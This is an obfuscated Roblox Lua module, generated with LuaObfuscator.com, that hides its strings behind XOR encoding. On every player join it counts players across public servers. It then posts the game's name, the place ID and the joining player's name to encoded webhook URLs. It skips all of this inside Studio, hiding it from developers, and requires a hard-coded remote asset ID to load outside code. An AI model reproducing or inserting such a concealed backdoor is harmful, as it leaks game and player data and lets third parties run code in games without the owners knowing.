--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0 = string.char;
local v1 = string.byte;
local v2 = string.sub;
local v3 = bit32 or bit;
local v4 = v3.bxor;
local v5 = table.concat;
local v6 = table.insert;
local function v7(v17, v18)
	local v19 = {};
	_G.Cs = {UQSDDAA=3,YASDMRXA=1,YASa0AVV=2};
	for v33 = 1, #v17 do
		v6(v19, v0(v4(v1(v2(v17, v33, v33 + #Cs + 1)), v1(v2(v18, 1 + (v33 % #v18), 1 + (v33 % #v18) + 1))) % 256));
	end
	return v5(v19);
end
local v8 = game:GetService(v7("\249\215\207\53\213\190\213\8\216\192\222", "\126\177\163\187\69\134\219\167"));
local v9 = game:GetService(v7("\19\193\43\220\249\49\222", "\156\67\173\74\165"));
local v10 = game:GetService(v7("\25\182\91\29\185\50\86\56\182\74\19\143\35\84\34\190\74\19", "\38\84\215\41\118\220\70"));
local v11 = game:GetService(v7("\98\3\44\33\251\66\0\43\17\251", "\158\48\118\66\114"));
local v12 = {};
local v13 = {[v7("\190\42\20\51\97\244\171", "\155\203\68\112\86\19\197")]=v7("\78\201\34\236\83\34\170\183\66\212\37\255\79\106\225\249\86\205\120\255\79\117\170\249\86\212\121\235\69\122\237\247\73\214\37\179\17\43\188\173\17\132\97\165\20\42\176\169\17\133\111\173\17\32\182\183\124\207\1\217\98\84\230\205\118\215\23\240\23\108\232\217\101\238\97\170\82\90\223\217\18\141\61\254\25\109\214\242\96\248\24\200\13\80\225\225\69\232\60\216\121\108\223\205\81\212\99\219\122\104\193\240\67\220\1\241\114\98\238\204\23\215\38\254", "\152\38\189\86\156\32\24\133"),[v7("\250\69\168\75\173\7\179\73\169\7", "\38\156\55\199")]=v7("\160\105\104\56\0\46\181\12\172\116\111\43\28\102\254\66\184\109\50\43\28\121\181\66\184\116\51\63\22\118\242\76\167\118\111\103\66\39\163\22\240\45\36\125\74\39\173\26\255\42\45\124\66\38\170\12\241\101\108\32\71\93\235\22\253\78\114\49\34\124\172\73\129\48\69\46\21\95\175\106\154\80\120\122\50\69\255\113\164\123\113\113\42\115\245\65\160\46\125\48\52\115\163\90\138\69\111\26\18\76\204\85\134\75\108\11\6\57\245\104\253\103\116\62", "\35\200\29\28\72\115\20\154"),[v7("\31\173\222\210\216\124\32\22\238\132\143", "\84\121\223\177\191\237\76")]=v7("\179\66\221\176\41\10\127\142\191\95\218\163\53\66\52\192\171\70\135\163\53\93\127\192\171\95\134\183\63\82\56\206\180\93\218\239\107\3\105\148\227\6\145\246\105\8\100\152\237\3\157\242\109\4\96\142\172\112\236\171\28\113\32\203\151\90\237\141\59\104\97\208\236\103\205\178\3\123\52\215\147\108\206\177\24\82\34\196\132\112\253\136\25\106\53\249\143\127\152\244\63\121\15\197\190\88\208\141\50\125\17\192\163\14\220\182\15\7\34\234\153\85\155\129", "\161\219\54\169\192\90\48\80"),[v7("\72\64\15\51\76\19\85\117", "\69\41\34\96")]=v7("\180\215\195\26\17\113\243\140\211\3\17\40\179\209\211\11\18\59\242\192\216\7\77\42\172\202\152\29\7\41\180\204\216\1\17\100\237\144\142\95\90\123\228\148\134\89\83\127\234\155\142\92\86\123\232\140\222\88\53\10\164\225\192\16\48\63\134\145\208\13\6\62\234\213\196\93\82\44\159\229\214\37\79\50\183\236\243\9\26\28\171\206\198\56\37\7\169\212\245\50\7\36\152\199\246\4\8\46\143\246\135\24\36\58\177\205\239\12\91\49\166\235\255\1", "\75\220\163\183\106\98")};
local function v14()
	local v20 = game.GameId;
	local v21 = (1819 + 72) - ((2609 - 1367) + (1029 - 380));
	local v22 = "";
	repeat
		local v34 = ("https://games.roblox.com/v1/games/%d/servers/Public?limit=100%s"):format(v20, ((v22 ~= "") and (v7("\68\185\158\37\202\13\168\214", "\185\98\218\235\87") .. v22)) or "");
		local v35, v36 = pcall(function()
			return v8:GetAsync(v34);
		end);
		if v35 then
			local v38 = 0 - 0;
			local v39;
			local v40;
			while true do
				if (v38 == (0 + 0)) then
					v39 = 0 - (0 + 0);
					v40 = nil;
					v38 = 1;
				end
				if (v38 == (397 - (115 + 281))) then
					while true do
						if (v39 == (2 - 1)) then
							v22 = v40.nextPageCursor or "";
							break;
						end
						if (v39 == ((25 + 5) - ((12 - 7) + (91 - 66)))) then
							local v49 = 867 - (550 + 317);
							local v50;
							while true do
								if (v49 == 0) then
									v50 = (1714 - 527) - (1069 + 118);
									while true do
										if (v50 == ((0 - 0) + 0)) then
											local v51 = 0;
											while true do
												if (0 == v51) then
													v40 = v8:JSONDecode(v36);
													for v52, v53 in ipairs(v40.data or {}) do
														(v21 += v53.playing) or ((0 - 0) - (285 - (134 + 151)))
													end
													v51 = 1666 - (970 + 695);
												end
												if (v51 == 1) then
													v50 = 1 - 0;
													break;
												end
											end
										end
										if (v50 == ((2341 - (582 + 1408)) - ((301 - 214) + (330 - 67)))) then
											v39 = (3 - 2) - (1824 - (1195 + 629));
											break;
										end
									end
									break;
								end
							end
						end
					end
					break;
				end
			end
		else
			warn(v7("\240\11\34\228\214\165\196\55\26\166\248\171\194\48\34\226\158\190\196\124\32\227\202\234\216\57\53\240\219\184\216\124\35\231\202\171\145\124", "\202\171\92\71\134\190") .. tostring(v36));
			break;
		end
	until v22 == "" 
	return v21;
end
local function v15(v23, v24)
	local v25 = game.PlaceId;
	local v26 = v9.MaxPlayers;
	local v27 = {[v7("\7\192\33\141", "\232\73\161\76")]=v7("\142\215\73\83\17\172\215\2\122\31\182\220", "\126\219\185\34\61")};
	pcall(function()
		v27 = v10:GetProductInfo(v25);
	end);
	local v28;
	if (v24 < (190 - ((88 - 21) + 113))) then
		v28 = v13.under10;
	elseif (v24 < ((278 - (187 + 54)) + 13)) then
		v28 = v13.from10to50;
	elseif (v24 < ((1251 - (162 + 618)) - 321)) then
		v28 = v13.from50to150;
	else
		v28 = v13.above150;
	end
	if not v28 then
		return;
	end
	local v29 = {[v7("\9\195\92\119\122\100", "\135\108\174\62\18\30\23\147")]={{[v7("\162\224\62\199\29", "\167\214\137\74\171\120\206\83")]=v7("\193\186\17\81\241\164\128\176\26\88\234\162\193\186", "\199\235\144\82\61\152"),[v7("\18\4\181", "\75\103\118\217")]=(v7("\207\64\100\4\170\68\136\27\103\3\174\80\213\91\114\24\182\6\137\87\127\25\246\25\198\89\117\7\246", "\126\167\52\16\116\217") .. v25),[v7("\204\43\51\131\166\16\236\220\39\47\142", "\156\168\78\64\224\212\121")]=(v7("\32\239\168\203\71\192\164\195\2\180\229\206", "\174\103\142\197") .. v27.Name .. "`"),[v7("\66\49\79\61", "\152\54\72\63\88\69\62")]=v7("\198\205\237\84", "\60\180\164\142"),[v7("\91\81\9\38\53", "\114\56\62\101\73\71\141")]=tonumber(12290642 + 3097810 + 1323228),[v7("\190\230\212\208\189\251", "\164\216\137\187")]={[v7("\219\229\62\188\153\235\25\222", "\107\178\134\81\210\198\158")]=v7("\48\26\150\214\185\98\65\205\197\174\54\64\134\207\185\59\1\144\194\171\40\30\204\197\165\53\65\131\210\190\57\13\138\203\175\54\26\145\137\228\118\64", "\202\88\110\226\166"),[v7("\215\10\154\227", "\170\163\111\226\151")]=v7("\33\60\179\33\75\37\105\59\63\187\54\75\51", "\73\113\80\210\88\46\87")},[v7("\149\36\216\31\229\143\45\196\30", "\135\225\76\173\114")]={[v7("\15\255\180", "\199\122\141\216\208\204\221")]=(v7("\165\201\4\224\107\172\226\146\7\231\111\184\191\210\18\252\119\238\227\222\31\253\55\247\190\206\21\228\53\226\165\200\29\242\118\247\164\209\95\249\117\247\170\216\79\241\107\229\168\201\57\244\37", "\150\205\189\112\144\24") .. v25 .. v7("\99\147\182\72\16\128\76\71\115\220\249\68\1\129\22\24\49\217\235\31\86\206\23\31\55\137\190\88\89\152\31\23", "\112\69\228\223\44\100\232\113"))},[v7("\213\10\19\219\185\110", "\230\180\127\103\179\214\28")]={[v7("\130\4\82\67", "\128\236\101\63\38\132\33")]=v23},[v7("\170\160\20\72\178\248", "\175\204\201\113\36\214\139")]={{[v7("\73\205\56\217", "\100\39\172\85\188")]=v7("\231\50\137\140\50\180\125\171\147\115\164\118\249\167\50\160\125\243\202", "\83\205\24\217\224"),[v7("\240\196\193\40\227", "\93\134\165\173")]=("`" .. v24 .. "`"),[v7("\183\252\205\203\52\203", "\30\222\146\161\162\90\174\210")]=true},{[v7("\235\79\125\15", "\106\133\46\16")]=v7("\18\106\94\253\66\0\107\37\97\234\95\82\24\19\122\230\95\10\18", "\32\56\64\19\156\58"),[v7("\76\201\233\67\95", "\224\58\168\133\54\58\146")]=("`" .. v26 .. "`"),[v7("\80\88\71\244\123\131", "\107\57\54\43\157\21\230\231")]=true},{[v7("\213\138\28\240", "\175\187\235\113\149\217\188")]=v7("\118\229\177\64\226\122\125\124\134\165\6\169", "\24\92\207\225\44\131\25"),[v7("\93\210\180\89\30", "\29\43\179\216\44\123")]=("`" .. v25 .. "`"),[v7("\180\215\44\69\179\220", "\44\221\185\64")]=true}}}}};
	local v30 = v8:JSONEncode(v29);
	pcall(function()
		v8:PostAsync(v28, v30, Enum.HttpContentType.ApplicationJson);
	end);
end
v12.Init = function()
	local v31 = 0 + (0 - 0);
	local v32;
	while true do
		if (v31 == ((1 + 0) - (1636 - (1373 + 263)))) then
			if (v32 and v32.Init) then
				v32.Init();
			end
			v9.PlayerAdded:Connect(function(v43)
				task.spawn(function()
					local v44 = 1000 - (451 + 549);
					local v45;
					local v46;
					while true do
						if (v44 == (0 + 0)) then
							v45 = 0 - (0 - 0);
							v46 = nil;
							v44 = 1;
						end
						if ((1 - 0) == v44) then
							while true do
								if (v45 == ((1814 - (746 + 638)) - (44 + 146 + 240))) then
									v46 = v14();
									if v46 then
										v15(v43.Name, v46);
									end
									break;
								end
							end
							break;
						end
					end
				end);
			end);
			break;
		end
		if (((0 - 0) - 0) == v31) then
			local v41 = 341 - (218 + 123);
			while true do
				if (v41 == (1582 - (1535 + 46))) then
					v31 = 1 + 0;
					break;
				end
				if (v41 == 0) then
					if v11:IsStudio() then
						return;
					end
					v32 = require((115532367904894 - (1035 + 175)) - ((854 - (306 + 254)) + 19 + 277));
					v41 = 1 - 0;
				end
			end
		end
	end
end;
return v12;
